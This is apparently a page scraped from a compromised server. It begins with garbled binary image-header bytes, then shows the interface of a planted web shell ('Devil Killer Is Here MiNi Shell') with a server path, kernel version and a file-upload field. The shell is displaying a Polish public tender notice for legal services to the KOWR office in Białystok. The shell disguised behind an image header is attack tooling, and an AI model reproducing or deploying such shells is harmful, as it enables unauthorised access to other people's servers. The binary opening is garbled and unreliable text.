JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250428/0020797201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Stała i kompleksowa obsługa prawna świadczona na rzecz Oddziału Terenowego KOWR w Białymstoku w latach 2025 – 2026 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Krajowy Ośrodek Wsparcia Rolnictwa</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Oddział Terenowy w Białymstoku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 36784953800010</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Generała Gustawa Orlicz-Dreszera 1 lok.1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Białystok</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">15-797</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL841 - Białostocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">85 6643150</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne.bialystok@kowr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/kowr</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - agencja wykonawcza</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarowanie mieniem Zasobu Własności Rolnej Skarbu Państwa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Stała i kompleksowa obsługa prawna świadczona na rzecz Oddziału Terenowego KOWR w Białymstoku w latach 2025 – 2026 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a9745ec0-821a-4f94-8845-c90b2bd3dd97</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00207972</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00089194/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Stała i kompleksowa obsługa prawna OT Białystok przez okres 12 miesięcy - II zadanie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kowr.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu<br/>platformy zakupowej Krajowego Ośrodka Wsparcia Rolnictwa pod adresem: https://kowr.eb2b.com.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe informacje znajdują się w Rozdziale VIII SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z rodz. XXI SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z rodz. XXI SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BIA.WO.260.2.2025.AMI</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 144900 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia są usługi prawne w zakresie: stałej i kompleksowej obsługi prawnej związanej z prowadzoną przez KOWR działalnością, doradztwa prawnego, zastępstw procesowych w postępowaniach sądowych i administracyjnych oraz windykacji należności związanych z działalnością Krajowego Ośrodka Wsparcia Rolnictwa<br/>Oddział Terenowy w Białymstoku w latach 2025-2026 poprzez świadczenie usług w siedzibie OT KOWR w Białymstoku. W ramach realizacji zamówienia Wykonawca będzie zobowiązany do pełnienia dyżuru<br/>w wymiarze 30 godzin w tygodniu w siedzibie OT KOWR OT w Białymstoku<br/>mieszczącym się przy ul. Gen. Gustawa Orlicz-Dreszera 1 lok. 1, 15-797 Białystok - od 1 do maksymalnie 3 osób stale pełniących dyżur, 6 godzin dziennie w każdym dniu roboczym – w godzinach pracy biura, tj. od 8:00 do 14:00. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79100000-5 - Usługi prawnicze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający wybierze jako najkorzystniejszą ofertę Wykonawcy, która uzyska największą liczbę punktów obliczoną jako sumę punktów uzyskanych w następujących kryteriach oceny ofert:<br/>1)	cena (Kc) – 60 %<br/>2)	doświadczenia koordynatora (Kd) – 40 %, w tym:<br/>2.	Punkty w kryterium „cena” zostaną obliczone według wzoru:<br/>najniższa cena oferty brutto <br/>spośród ofert nieodrzuconych<br/>Kc = ----------------------------------------------------- x 100 x 60 %<br/>cena brutto w badanej ofercie<br/>4.	W kryterium „doświadczenie koordynatora zespołu obsługi prawnej” punkty będą przyznawane według następujących zasad:	<br/>a)	Podkryterium „doświadczenie zawodowe”. <br/>W tym podkryterium można uzyskać maksymalnie 10 punktów, liczone w następujący sposób:<br/>•	5 punktów - za 6 i więcej lat doświadczenia zawodowego jako radca prawny lub adwokat polegającego na świadczeniu obsługi prawnej na rzecz jednostki sektora finansów publicznych w okresie od 1 stycznia 2005 r. do chwili obecnej;<br/>•	10 punktów - za 10 i więcej lat doświadczenia zawodowego jako radca prawny lub adwokat polegającego na świadczeniu obsługi prawnej na rzecz jednostki sektora finansów publicznych w okresie od 1 stycznia 2005 r. do chwili obecnej<br/>b)	Podkryterium „pełnomocnik procesowy I”<br/>Zamawiający w rozdziale XV ust. 12 pkt.1 lit. b SWZ wymagał, aby koordynator zespołu obsługi prawnej brał udział w charakterze pełnomocnika w co najmniej 5 postępowaniach przed Krajową Izbą Odwoławczą w okresie ostatnich 12 miesiącach przed upływem terminu składania ofert.<br/>W tym podkryterium można uzyskać maksymalnie 10 punktów, liczone w następujący sposób:<br/>•	5 punktów za 6 i więcej postępowań przed KIO w okresie ostatnich 12 miesięcy przed upływem terminu składania ofert<br/>•	10 punktów za 10 i więcej postępowań przed KIO w okresie ostatnich 12 miesięcy przed upływem terminu składania ofert<br/>c)	Podkryterium „pełnomocnik procesowy II”<br/>Zamawiający w rozdziale XV ust. 12 pkt.1 lit. c SWZ wymagał, aby koordynator zespołu obsługi prawnej brał udział w charakterze pełnomocnika w co najmniej 5 postępowaniach przed sądem powszechnym w sprawach z zakresu prawa cywilnego reprezentując jednostkę sektora finansów publicznych w okresie ostatnich 12 miesięcy przed upływem terminu składania ofert.<br/>W tym podkryterium można uzyskać maksymalnie 10punktów, liczone w następujący sposób:<br/>•	5 punktów za 6 i więcej postępowań przed sądem powszechnym w sprawach z zakresu prawa cywilnego reprezentując jednostkę sektora finansów publicznych w okresie ostatnich 12 miesięcy przed upływem terminu składania ofert<br/>•	10 punktów za 20 i więcej postępowań przed sądem powszechnym w sprawach <br/>z zakresu prawa cywilnego reprezentując jednostkę sektora finansów publicznych <br/>w okresie ostatnich 12 miesięcy przed upływem terminu składania ofert<br/>d)	Podkryterium „pełnomocnik procesowy III”<br/>Zamawiający w rozdziale XV ust. 12 pkt.1 lit. d SWZ wymagał, aby koordynator zespołu obsługi prawnej brał udział w charakterze pełnomocnika w co najmniej 5 postępowaniach przed sądem pracy w sprawach z zakresu prawa pracy reprezentując jednostkę sektora finansów publicznych w okresie ostatnich 12 miesięcy przed upływem terminu składania ofert.<br/>W tym podkryterium można uzyskać maksymalnie 10punktów, liczone w następujący sposób:<br/>•	5 punktów za 6 i więcej postępowań przed sądem pracy w sprawach z zakresu prawa pracy reprezentując jednostkę sektora finansów publicznych w okresie ostatnich <br/>12 miesięcy przed terminem składania ofert<br/>•	10 punktów za 20 i więcej postępowań przed sądem pracy w sprawach z zakresu prawa pracy reprezentując jednostkę sektora finansów publicznych w okresie ostatnich <br/>12 miesięcy przed terminem składania ofert.<br/>Punkty w kryterium „doświadczenie koordynatora zespołu obsługi prawnej” zostaną obliczone jako suma punktów z podkryteriów wskazanych w lit. od a do d.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie koordynatora</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu na podstawie przesłanek wskazanych w art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4-10 ustawy Pzp i w stosunku, do których nie zachodzi którakolwiek z okoliczności, o których mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących<br/>ochronie bezpieczeństwa narodowego (t.j.: Dz. U. 2024 r. poz. 507),<br/>2) spełniają warunki udziału w postępowaniu, określone w niniejszym rozdziale.<br/>Warunek udziału w postępowaniu dotyczący sytuacji ekonomicznej zostanie spełniony, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 1 000 000 złotych.<br/>Warunek udziału w postępowaniu dotyczący zdolności zawodowej w zakresie doświadczenia Wykonawcy zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat, licząc wstecz od dnia, w którym upływa termin składania ofert wykonał należycie, a w przypadku świadczeń powtarzających się lub ciągłych – wykonuje należycie, nieprzerwanie przez okres minimum 12 miesięcy, co najmniej jedną usługę polegającą na obsłudze prawnej jednostki sektora finansów publicznych w rozumieniu ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych (Dz. U. z 2024 r., poz. 1530 z późn. zm.), o wartości co najmniej 150 000 zł brutto.<br/>Warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej dotyczącej Wykonawcy w zakresie doświadczenia zostanie spełniony, jeżeli Zamawiający uzna, iż Wykonawca zdolny do należytego wykonania udzielanego zamówienia, to taki, który wykaże się wiedzą i doświadczeniem w wykonaniu, a w przypadku świadczeń okresowych lub ciągłych również wykonywaniu, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie świadczył lub świadczy co najmniej 2 usługi polegające na świadczeniu obsługi prawnej na rzecz jednostki sektora finansów<br/>publicznych w ramach kompleksowej obsługi prawnej jednostki sektora finansów publicznych, przy czym doświadczenie Wykonawcy obejmuje co najmniej zagadnienia z prawa pracy, finansów publicznych oraz zamówień publicznych. Wymaga się, aby umowa do dnia złożenia oferty wykonywana była nieprzerwanie przez okres co najmniej 12 miesięcy. Jako jedną usługę Zamawiający rozumie jedną umowę.<br/>Warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej dotyczącej Wykonawcy w zakresie doświadczenia zostanie spełniony, jeżeli Zamawiający uzna, iż Wykonawca zdolny do należytego wykonania udzielanego zamówienia, to taki, który wykaże się wiedzą i doświadczeniem w okresie ostatnich 12 miesięcy przed upływem terminu składani ofert w wykonaniu co najmniej jednej usługi zastępstwa procesowego na rzecz podmiotu sektora finansów publicznych w<br/>sprawie cywilnej o wartości przekraczającej 4.000.000,00 zł.<br/>Warunek udziału w postępowaniu dotyczący zdolności zawodowej w zakresie dysponowania osobami skierowanymi przez wykonawcę do realizacji zamówienia publicznego zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej trzema osobami, które zostaną skierowane do pełnienia dyżurów w siedzibach Zamawiającego, posiadającymi tytuł zawodowy radcy prawnego lub adwokata lub będącymi prawnikami zagranicznymi wykonującymi stałą praktykę na podstawie ustawy<br/>z dnia 5 lipca 2002 r. o świadczeniu pomocy prawnej przez prawników zagranicznych w Rzeczypospolitej Polskiej.<br/>Wykonawca na każdą funkcję wymienioną poniżej wskaże osoby stanowiące personel kluczowy, który musi być dostępny na etapie realizacji zamówienia spełniający następujące wymagania:<br/>1) Osoba proponowana do pełnienia funkcji: Koordynator Zespołu obsługi prawnej/Radca prawny/Adwokat<br/>Wymagana liczba osób: 1,<br/>minimalne kwalifikacje: co najmniej 15 – letnie uprawnienia radcy prawnego lub adwokata potwierdzone aktualnym wpisem odpowiednio na listę radców prawnych, o której mowa w ustawie z dnia 6 lipca 1982 roku o radcach prawnych lub na listę adwokatów, zgodnie z ustawą z dnia 26 maja 1982 roku o adwokaturze.<br/>Doświadczenie zawodowe:<br/>a) minimum 5 lat doświadczenia zawodowego jako radca prawny lub adwokat, polegającego na świadczeniu obsługi prawnej na rzecz jednostki sektora finansów publicznych, oraz<br/>b) udział w charakterze pełnomocnika w co najmniej 5 postępowaniach przed<br/>Krajową Izbą Odwoławczą w okresie ostatnich 12 miesiącach przed upływem terminu składania ofert, oraz<br/>c) udział w charakterze pełnomocnika w co najmniej 5 postępowaniach przed sądem powszechnym w sprawach z zakresu prawa cywilnego reprezentując jednostkę sektora finansów publicznych w okresie ostatnich 12 miesięcy przed upływem terminu składania ofert, oraz<br/>d) udział w charakterze pełnomocnika w co najmniej 5 postępowaniach przed sądem pracy w sprawach z zakresu prawa pracy reprezentując jednostkę sektora finansów publicznych w okresie ostatnich 12 miesięcy przed upływem terminu składania ofert<br/>2) Osoba proponowana do pełnienia funkcji Zastępca Koordynatora Zespołu obsługi prawnej – Radca prawny/Adwokat<br/>wymagana liczba osób: 1,<br/>minimalne kwalifikacje: co najmniej 7-letnie uprawnienia radcy prawnego lub<br/>adwokata potwierdzone aktualnym wpisem odpowiednio na listę radców prawnych, o której mowa w ustawie z dnia 6 lipca 1982 roku o radcach prawnych lub listę adwokatów zgodnie z ustawą z dnia 26 maja 1982 roku o adwokaturze.<br/>Doświadczenie zawodowe:<br/>minimum 5 lat doświadczenia zawodowego jako radca prawny lub adwokat,<br/>polegającego na świadczeniu obsługi prawnej na rzecz jednostki sektora finansów publicznych.<br/>3) Osoba proponowana do pełnienia funkcji – Radca prawny/Adwokat<br/>wymagana liczba osób: 1<br/>minimalne kwalifikacje: co najmniej 5-letnie uprawnienia radcy prawnego lub<br/>adwokata potwierdzone aktualnym wpisem odpowiednio na listę radców prawnych, o której mowa w ustawie z dnia 6 lipca 1982 roku o radcach prawnych lub listę adwokatów zgodnie z ustawą z dnia 26 maja 1982 roku o adwokaturze. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty wykonawca dołącza oświadczenie o niepodleganiu wykluczeniu<br/>z postępowania oraz spełnianiu warunków udziału w postępowaniu, które stanowi załącznik nr 2 do SWZ. Oświadczenie, o którym mowa w ust. 1, stanowi dowód potwierdzający brak podstaw wykluczenia z postępowania oraz spełniania warunków udziału w postępowaniu na dzień składania ofert oraz tymczasowo zastępuje wymagane przez zamawiającego podmiotowe środki dowodowe.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w ust. 1, składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4. W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, Wykonawca przedstawia, wraz z oświadczeniem, o którym mowa w ust. 1, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, o którym mowa w art. 117 ust. 4 ustawy, z którego musi wynikać, które usługi wykonają poszczególni Wykonawcy.<br/>6. Wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby, składa wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca, realizując zamówienie,<br/>będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>7. W celu potwierdzenia spełniania przez Wykonawcę warunku udziału<br/>w postępowaniu dotyczącego zdolności zawodowej w zakresie dysponowania osobami,które zostaną skierowane przez Wykonawcę do pełnienia dyżurów w siedzibie Zamawiającego, Do oferty wykonawca dołącza oświadczenie o niepodleganiu wykluczeniu<br/>z postępowania oraz spełnianiu warunków udziału w postępowaniu, które stanowi załącznik nr 2 do SWZ. Oświadczenie, o którym mowa w ust. 1, Wykonawca przedkłada wykaz osób, skierowanych przez Wykonawcę do pełnienia dyżurów w siedzibie Zamawiającego, wraz z informacjami na temat ich uprawnień i doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wykaz ten należy sporządzić zgodnie z ust.<br/>2 Formularza Oferty pn.: „Wykaz osób, skierowanych przez Wykonawcę do<br/>pełnienia dyżurów w siedzibie Zamawiającego”.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Do oferty wykonawca dołącza oświadczenie o niepodleganiu wykluczeniu<br/>z postępowania oraz spełnianiu warunków udziału w postępowaniu, które stanowi załącznik nr 2 do SWZ. Oświadczenie, o którym mowa w 